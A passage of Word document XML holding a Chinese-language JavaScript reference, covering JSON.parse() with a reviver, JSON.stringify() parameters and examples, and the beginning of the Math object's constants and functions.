      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>的大部分使用场景都很寻常：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=JSON.parse(text);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>函数会把</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象转换</w:t>
      </w:r>
      <w:r>
        <w:t>成字符串，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>函数再反向转换回来。下面这个例子还过滤属性名，并通过返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>来从结果对象中移除某些特定属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data JSON.parse(text,function(name,value){//</w:t>
      </w:r>
      <w:r>
        <w:t>移除掉所有属性名以下划线开头的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(name[0]=='_')return undefined;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>ISO-8601</w:t>
      </w:r>
      <w:r>
        <w:t>日期格式的字符串，则把它转换为</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof value==="string"</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/^\d\d\d\d-\d\d-\d\</w:t>
      </w:r>
      <w:r>
        <w:t>dT\d\d:\d\d:\d\d.\d\d\dZ$/.test(value))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new Date(value);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则的话，就原样返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return value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JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="679" w:name="JSON_stringify__"/>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="679"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>序列化对象、数组或原始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.stringify(o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.stringify(o,flter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JSON.stringify(o,flter,indent)</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要转换成</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>字符串的对象、数组或原始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以是一个可选函数，用来在字符串化前对值做一些替换。也可以是一个数组，包含那些需要字符串化的属性名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>indent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可选参数。需要输出格式化的可阅读代码时，使用</w:t>
      </w:r>
      <w:r>
        <w:t>indent</w:t>
      </w:r>
      <w:r>
        <w:t>参数可以指定缩进字符串或用来缩进的空格个数。如果省略该参数，返回的字符串将不带任何额外的空格，这是给编译器看的，很难直接阅读。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串，代表</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的值，同时通过了</w:t>
      </w:r>
      <w:r>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:t>的过滤，以及根据</w:t>
      </w:r>
      <w:r>
        <w:t>indent</w:t>
      </w:r>
      <w:r>
        <w:t>进行了格式化。</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JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>将原始值、对象或数组转换成一个</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串，该</w:t>
      </w:r>
      <w:r>
        <w:t>字符串随后可以被</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>解析。通常，调用该函数时只带一个参数，并返回相应字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当带一个参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>时，且该参数值仅包含对象、数组、字符串、数值、布尔值和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>值时，字符串化的过程很直接明了。然而，当需要字符串化的值包含类的实例对象时，字符串化的过程就比较复杂了。当</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>遇到带有名为</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法的对象（或数组）时，它会调用该对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，并使用该方法的返回值而不是该对象本身来进行字符串化。调用</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>时会传入一个字符串参数，该参数是对象的属性名或数组序号。</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>类定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，使用</w:t>
      </w:r>
      <w:r>
        <w:t>Date.toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来将</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换成字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的其他内置对象都没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，不过可以为自己的类定义对应方法。注意，虽然</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法名有将对象转换为</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>的含义，但实际上</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以不转换调用对象：它的作用仅仅是返回一个值，用来在字符串化的过程中，替换原始对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数使得可以在字符串化的过程</w:t>
      </w:r>
      <w:r>
        <w:t>中添加过滤操作。该可选参数可以是函数或数组，这两种情况提供了完全不同的过滤功能。如果该参数是函数，则它是一个</w:t>
      </w:r>
      <w:r>
        <w:t>replacer</w:t>
      </w:r>
      <w:r>
        <w:t>函</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数，与上面描述的</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法有点类似。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>replacer</w:t>
      </w:r>
      <w:r>
        <w:t>函数，该函数会在每一个需要字符串化的值上调用。</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指向定义该值的对象或数组。</w:t>
      </w:r>
      <w:r>
        <w:t>replacer</w:t>
      </w:r>
      <w:r>
        <w:t>函数的第一个参数是该对象中的对象属性名或数组序号，第二个参数则是值本身。</w:t>
      </w:r>
      <w:r>
        <w:t>replacer</w:t>
      </w:r>
      <w:r>
        <w:t>函数的返回值会替换掉需要字符串化的值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>replacer</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>或没有任何返回值，则会在字符串化时忽略该值（以及</w:t>
      </w:r>
      <w:r>
        <w:t>它的数组元素或对象属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数是一个字符串数组（或数值数组</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>数值会转换为字符串），该数组会作为对象属性名。属性名不在该数组中的任何对象属性在字符串化时都会忽略掉。此外，返回的字符串中属性的顺序，会与该数组中的属性名顺序一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的通常是不带任何空格或换行符的给机器阅读的字符串。如果想输出可读性更好的字符串，需要指定第三个参数。如果指定的第三个参数是介于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>之间的数值，则</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>会在每一</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>层级</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的输出</w:t>
      </w:r>
      <w:r>
        <w:t>插入换行符和指定个数的空格。如果指定的是非空字符串，则</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>会插入换行符和该字符串（只取前</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>个字符）来缩进层级。</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lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>基本序列化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=JSON.stringify(data);//</w:t>
      </w:r>
      <w:r>
        <w:t>精确指定要序列化的字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=JSON.stringify(address,["city","state","country"]);//</w:t>
      </w:r>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:t>replacer</w:t>
      </w:r>
      <w:r>
        <w:t>函数，以使得可序列化</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>text=JSON.stringify(patterns,function(key,value){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(value.constructor===RegExp)return value.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>或使用下面这种方式来实现同样的替换：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp.prototype.toJSON=function(){return this.toString();}</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JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="680" w:name="Math"/>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:bookmarkEnd w:id="680"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数学函数和常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.constant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.function()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>，自然对数的底数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Math.LN10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>的自然对数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LN2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的自然对数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LOG10E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>为底的对数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.LOG2E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>为底的对数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.PI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
      <w:r>
        <w:t>π</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.SQRT1_2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根的倒数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.SQRT2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>静态函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Math.abs()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算绝对值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.acos()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算反余弦值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.asin()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算反正弦值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.atan()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算反正切值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.atan2()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算从</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴到指定点的角度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.ceil()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对一个数字向上取整。</w:t>
      </w:r>
    </w:p>
